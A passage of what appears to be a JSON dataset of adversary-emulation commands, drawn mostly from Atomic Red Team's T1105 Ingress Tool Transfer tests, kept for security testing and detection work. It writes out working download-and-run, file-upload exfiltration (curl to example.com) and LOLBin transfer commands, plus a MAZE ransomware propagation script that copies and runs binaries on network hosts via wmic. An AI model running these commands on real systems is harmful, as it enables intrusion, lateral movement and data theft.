#{remote_destination}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "PathToAtomicsFolder\\T1105\\src\\T1105.bat 1>NUL \n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"$env:comspec\" \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\#{remote_drive_letter}$\\Windows\\Temp\\T1105.exe\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:\\Windows\\Temp\\T1105.exe\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\C$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i C:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\ -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\PrintBrm.zip >nul 2>&1 \nC:\\Windows\\System32\\spool\\tools\\PrintBrm.exe -b -d #{Path_unc} -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} PathToAtomicsFolder\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe #{replace_cab} %TEMP% /A\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n", + "source": "data/abilities/command-and-control/60f63260-39bb-4136-87a0-b6c2dca799fc.yml", + "name": "Download, install and start new process under PowerShell Core 6" + }, + { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n", + "source": "data/abilities/command-and-control/eb814e03-811a-467a-bc6d-dcd453750fa2.yml", + "name": "Download and install PSTools by unzipping the file" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1105", + "display_name": "Ingress Tool Transfer", + "atomic_tests": [ + { + "name": "rsync remote file copy (push)", + "auto_generated_guid": "0fc6e977-cb12-44f6-b263-2824ba917409", + "description": "Utilize rsync to perform a remote file copy (push)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Remote path to receive rsync", + "type": "Path", + "default": "/tmp/victim-files" + }, + "remote_host": { + "description": "Remote host to copy toward", + "type": "String", + "default": "victim-host" + }, + "local_path": { + "description": "Path of folder to copy", + "type": "Path", + "default": "/tmp/adversary-rsync/" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "victim" + } + }, + "executor": { + "command": "rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}\n", + "name": "bash" + } + }, + { + "name": "rsync remote file copy (pull)", + "auto_generated_guid": "3180f7d5-52c0-4493-9ea0-e3431a84773f", + "description": "Utilize rsync to perform a remote file copy (pull)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Path of folder to copy", + "type": "Path", + "default": "/tmp/adversary-rsync/" + }, + "remote_host": { + "description": "Remote host to copy from", + "type": "String", + "default": "adversary-host" + }, + "local_path": { + "description": "Local path to receive rsync", + "type": "Path", + "default": "/tmp/victim-files" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "adversary" + } + }, + "executor": { + "command": "rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}\n", + "name": "bash" + } + }, + { + "name": "scp remote file copy (push)", + "auto_generated_guid": "83a49600-222b-4866-80a0-37736ad29344", + "description": "Utilize scp to perform a remote file copy (push)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Remote path to receive scp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "local_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-scp" + }, + "remote_host": { + "description": "Remote host to copy toward", + "type": "String", + "default": "victim-host" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "victim" + } + }, + "executor": { + "command": "scp #{local_file} #{username}@#{remote_host}:#{remote_path}\n", + "name": "bash" + } + }, + { + "name": "scp remote file copy (pull)", + "auto_generated_guid": "b9d22b9a-9778-4426-abf0-568ea64e9c33", + "description": "Utilize scp to perform a remote file copy (pull)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_host": { + "description": "Remote host to copy from", + "type": "String", + "default": "adversary-host" + }, + "local_path": { + "description": "Local path to receive scp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "remote_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-scp" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "adversary" + } + }, + "executor": { + "command": "scp #{username}@#{remote_host}:#{remote_file} #{local_path}\n", + "name": "bash" + } + }, + { + "name": "sftp remote file copy (push)", + "auto_generated_guid": "f564c297-7978-4aa9-b37a-d90477feea4e", + "description": "Utilize sftp to perform a remote file copy (push)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Remote path to receive sftp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "local_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-sftp" + }, + "remote_host": { + "description": "Remote host to copy toward", + "type": "String", + "default": "victim-host" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "victim" + } + }, + "executor": { + "command": "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", + "name": "bash" + } + }, + { + "name": "sftp remote file copy (pull)", + "auto_generated_guid": "0139dba1-f391-405e-a4f5-f3989f2c88ef", + "description": "Utilize sftp to perform a remote file copy (pull)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_host": { + "description": "Remote host to copy from", + "type": "String", + "default": "adversary-host" + }, + "local_path": { + "description": "Local path to receive sftp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "remote_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-sftp" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "adversary" + } + }, + "executor": { + "command": "sftp #{username}@#{remote_host}:#{remote_file} #{local_path}\n", + "name": "bash" + } + }, + { + "name": "certutil download (urlcache)", + "auto_generated_guid": "dd3b61dd-7bbc-48cd-ab51-49ad1a776df0", + "description": "Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Local path to place file", + "type": "Path", + "default": "Atomic-license.txt" + } + }, + "executor": { + "command": "cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}\n", + "cleanup_command": "del #{local_path} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "certutil download (verifyctl)", + "auto_generated_guid": "ffd492e3-0455-4518-9fb1-46527c9f241b", + "description": "Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Local path to place file", + "type": "Path", + "default": "Atomic-license.txt" + } + }, + "executor": { + "command": "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f #{remote_file}\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }\n", + "cleanup_command": "Remove-Item \"certutil-$(Get-Date -format yyyy_MM_dd)\" -Force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - BITSAdmin BITS Download", + "auto_generated_guid": "a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b", + "description": "This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.\nThis technique is used by Qbot malware to download payloads.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "bits_job_name": { + "description": "Name of the created BITS job", + "type": "String", + "default": "qcxjb7" + }, + "local_path": { + "description": "Local path to place file", + "type": "Path", + "default": "%temp%\\Atomic-license.txt" + }, + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + } + }, + "executor": { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}\n", + "name": "command_prompt" + } + }, + { + "name": "Windows - PowerShell Download", + "auto_generated_guid": "42dc4460-9aa6-45d3-b1a6-3955d34e1fe8", + "description": "This test uses PowerShell to download a payload.\nThis technique is used by multiple adversaries and malware families.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "destination_path": { + "description": "Destination path to file", + "type": "Path", + "default": "$env:TEMP\\Atomic-license.txt" + } + }, + "executor": { + "command": "(New-Object System.Net.WebClient).DownloadFile(\"#{remote_file}\", \"#{destination_path}\")\n", + "cleanup_command": "Remove-Item #{destination_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "OSTAP Worming Activity", + "auto_generated_guid": "2ca61766-b456-4fcf-a35a-1233685e1cad", + "description": "OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "destination_path": { + "description": "Path to create remote file at. Default is local admin share.", + "type": "String", + "default": "\\\\localhost\\C$" + } + }, + "executor": { + "command": "pushd #{destination_path}\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "svchost writing a file to a UNC path", + "auto_generated_guid": "fa5a2759-41d7-4e13-a19c-e8f28a53566f", + "description": "svchost.exe writing a non-Microsoft Office file to a file with a UNC path.\nUpon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\\`, then execute svchost.exe with output to a txt file.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n", + "cleanup_command": "del C:\\T1105.txt >nul 2>&1\ndel C:\\\\svchost.exe >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Download a File with Windows Defender MpCmdRun.exe", + "auto_generated_guid": "815bef8b-bf91-4b67-be4c-abe4c2a94ccc", + "description": "Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed).\nThe input arguments \"remote_file\" and \"local_path\" can be used to specify the download URL and the name of the output file.\nBy default, the test downloads the Atomic Red Team license file to the temp directory.\n\nMore info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to download", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Location to save downloaded file", + "type": "Path", + "default": "%temp%\\Atomic-license.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Must have one of these Windows Defender versions installed: 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9", + "prereq_command": "$retVal = 1\nforeach ($version in @(\"4.18.2007.8-0\",\"4.18.2007.9\",\"4.18.2009.9\")){\n if (Test-Path \"$env:ProgramData\\Microsoft\\Windows Defender\\Platform\\$version\") { $retVal = 0}\n}\nexit $retVal\n", + "get_prereq_command": "Write-Host \"Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 must be installed manually\"" + } + ], + "executor": { + "command": "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}\n", + "cleanup_command": "del #{local_path} >nul 2>&1\ndel %temp%\\MpCmdRun.log >nul 2>&1", + "name": "command_prompt" + } + }, + { + "name": "whois file download", + "auto_generated_guid": "c99a829f-0bb8-4187-b2c6-d47d1df74cab", + "description": "Download a remote file using the whois utility\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "localhost" + }, + "remote_port": { + "description": "Remote port to connect to", + "type": "Integer", + "default": 8443 + }, + "output_file": { + "description": "Path of file to save output to", + "type": "Path", + "default": "/tmp/T1105.whois.out" + }, + "query": { + "description": "Query to send to remote server", + "type": "String", + "default": "Hello from Atomic Red Team test T1105" + }, + "timeout": { + "description": "Timeout period before ending process (seconds)", + "type": "Integer", + "default": 1 + } + }, + "dependencies": [ + { + "description": "The whois and timeout commands must be present\n", + "prereq_command": "which whois && which timeout\n", + "get_prereq_command": "echo \"Please install timeout and the whois package\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"#{query}\" > #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n" + } + }, + { + "name": "File Download via PowerShell", + "auto_generated_guid": "54a4daf1-71df-4383-9ba7-f1a295d8b6d2", + "description": "Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_remote_file": { + "description": "File to download", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt" + }, + "output_file": { + "description": "File to write to", + "type": "String", + "default": "LICENSE.txt" + } + }, + "executor": { + "command": "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}\n", + "name": "powershell" + } + }, + { + "name": "File download with finger.exe on Windows", + "auto_generated_guid": "5f507e45-8411-4f99-84e7-e38530c45d01", + "description": "Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.\nBecause this is being tested on the localhost, you should not be expecting a successful connection\nhttps://www.exploit-db.com/exploits/48815\nhttps://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "name": "command_prompt", + "command": "finger base64_filedata@#{remote_host}\n" + } + }, + { + "name": "Download a file with IMEWDBLD.exe", + "auto_generated_guid": "1a02df58-09af-4064-a765-0babe1a0d1e2", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.\nDownloaded files can be found in \"%LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>/[1].\" or `%LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>/[1]..\nRun \"Get-ChildItem -Path C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\INetCache\\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue\" without quotes and adding the correct username and file name to locate the file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_url": { + "description": "Location of file to be downloaded.", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml" + }, + "file_name": { + "description": "Name of the file to be downloaded without extension.", + "type": "string", + "default": "T1105" + } + }, + "executor": { + "command": "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled #{remote_url}\n", + "cleanup_command": "$inetcache = $env:LOCALAPPDATA + \"\\Microsoft\\Windows\\INetCache\\\" \n$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)\nif(\"\" -ne \"$file_to_be_removed\") { Remove-Item \"$file_to_be_removed\" -ErrorAction Ignore }\n", + "name": "powershell" + } + }, + { + "name": "Curl Download File", + "auto_generated_guid": "2b080b99-0deb-4d51-af0f-833d37c4ca6a", + "description": "The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.\nExpected output will include whether the file downloaded successfully or not.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_download": { + "description": "File to download", + "type": "String", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll" + }, + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system.\n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + } + ], + "executor": { + "command": "#{curl_path} -k #{file_download} -o c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k #{file_download} --output c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k #{file_download} -o c:\\programdata\\allthethingsx64.dll\n#{curl_path} -k #{file_download} -o %Temp%\\allthethingsx64.dll\n", + "cleanup_command": "del c:\\users\\public\\music\\allthethingsx64.dll >nul 2>&1\ndel c:\\users\\public\\music\\allthethingsx64.dll >nul 2>&1\ndel c:\\programdata\\allthethingsx64.dll >nul 2>&1\ndel %Temp%\\allthethingsx64.dll >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Curl Upload File", + "auto_generated_guid": "635c9a38-6cbf-47dc-8615-3810bc1167cf", + "description": "The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration\nExpected output will include whether the file uploaded successfully or not.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + }, + "remote_destination": { + "description": "Remote destination", + "type": "String", + "default": "www.example.com" + }, + "file_path": { + "description": "File to upload", + "type": "String", + "default": "c:\\temp\\atomictestfile.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system.\n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \u201chttps://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\u201d -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + }, + { + "description": "A file must be created to upload\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"This is an Atomic Test File\" > #{file_path}\n" + } + ], + "executor": { + "command": "#{curl_path} -T #{file_path} #{remote_destination}\n#{curl_path} --upload-file #{file_path} #{remote_destination}\n#{curl_path} -d #{file_path} #{remote_destination}\n#{curl_path} --data #{file_path} #{remote_destination}\n", + "name": "command_prompt" + } + }, + { + "name": "Download a file with Microsoft Connection Manager Auto-Download", + "auto_generated_guid": "d239772b-88e2-4a2e-8473-897503401bcc", + "description": "Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. \nThe issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.\nUpon successful execution the test will open calculator and Notepad executable for 10 seconds.\nreference:\nhttps://twitter.com/ElliotKillick/status/1455897435063074824\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/151\nhttps://lolbas-project.github.io/lolbas/Binaries/Cmdl32/\nhttps://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Path_to_file": { + "description": "Path to the Batch script", + "type": "Path", + "default": "PathToAtomicsFolder\\T1105\\src\\T1105.bat" + } + }, + "executor": { + "command": "#{Path_to_file} 1>NUL \n", + "cleanup_command": "del /f/s/q %temp%\\T1105 >nul 2>&1\nrmdir /s/q %temp%\\T1105 >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "MAZE Propagation Script", + "auto_generated_guid": "70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf", + "description": "This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\\Temp directory of each one. \nUpon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.\nReference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_file": { + "description": "Binary file to copy to remote machines", + "type": "string", + "default": "$env:comspec" + }, + "exe_remote_folder": { + "description": "Path to store executable on remote machine (no drive letter)", + "type": "String", + "default": "\\Windows\\Temp\\T1105.exe" + }, + "remote_drive_letter": { + "description": "Remote drive letter", + "type": "String", + "default": "C" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Binary file must exist at specified location (#{binary_file})\n", + "prereq_command": "if (Test-Path #{binary_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \"The binary_file input parameter must be set to a binary that exists on this computer.\"\n" + }, + { + "description": "Machine list must exist at specified location (\"$env:temp\\T1105MachineList.txt\")\n", + "prereq_command": "if (Test-Path \"$env:temp\\T1105MachineList.txt\") {exit 0} else {exit 1}\n", + "get_prereq_command": "new-item -path \"$env:temp\\T1105MachineList.txt\"\necho \"A machine list file has been generated at \"$env:temp\\T1105MachineList.txt\". Please enter the machines to target there, one machine per line.\"\n" + } + ], + "executor": { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "cleanup_command": "if (test-path \"$env:temp\\T1105CompletedHosts.txt\") \n{foreach ($machine in get-content -path \"$env:temp\\T1105CompletedHosts.txt\")\n{wmic /node: \"$machine\" process where name='\"regsvr32.exe\"' call terminate | out-null\nRemove-Item -path \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\" -force -erroraction silentlycontinue}}\nRemove-Item -path \"$env:temp\\T1105OfflineHosts.txt\" -erroraction silentlycontinue\nRemove-item -path \"$env:temp\\T1105CompletedHosts.txt\" -erroraction silentlycontinue\n", + "name": "powershell" + } + }, + { + "name": "Printer Migration Command-Line Tool UNC share folder into a zip file", + "auto_generated_guid": "49845fc1-7961-4590-a0f0-3dbcf065ae7e", + "description": "Create a ZIP file from a folder in a remote drive\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Path_unc": { + "description": "Path to the UNC folder", + "type": "Path", + "default": "\\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\" + }, + "Path_PrintBrm": { + "description": "Path to PrintBrm.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe" + } + }, + "executor": { + "command": "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "cleanup_command": "del %TEMP%\\PrintBrm.zip >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbas replace.exe use to copy file", + "auto_generated_guid": "54782d65-12f0-47a5-b4c1-b70ee23de6df", + "description": "Copy file.cab to destination\nReference: https://lolbas-project.github.io/lolbas/Binaries/Replace/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "replace_cab": { + "description": "Path to the cab file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1105\\src\\redcanary.cab" + }, + "Path_replace": { + "description": "Path to replace.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\replace.exe" + } + }, + "executor": { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} #{replace_cab} %TEMP% /A\n", + "cleanup_command": "del %TEMP%\\redcanary.cab >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbas replace.exe use to copy UNC file", + "auto_generated_guid": "ed0335ac-0354-400c-8148-f6151d20035a", + "description": "Copy UNC file to destination\nReference: https://lolbas-project.github.io/lolbas/Binaries/Replace/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "replace_cab": { + "description": "UNC Path to the cab file", + "type": "Path", + "default": 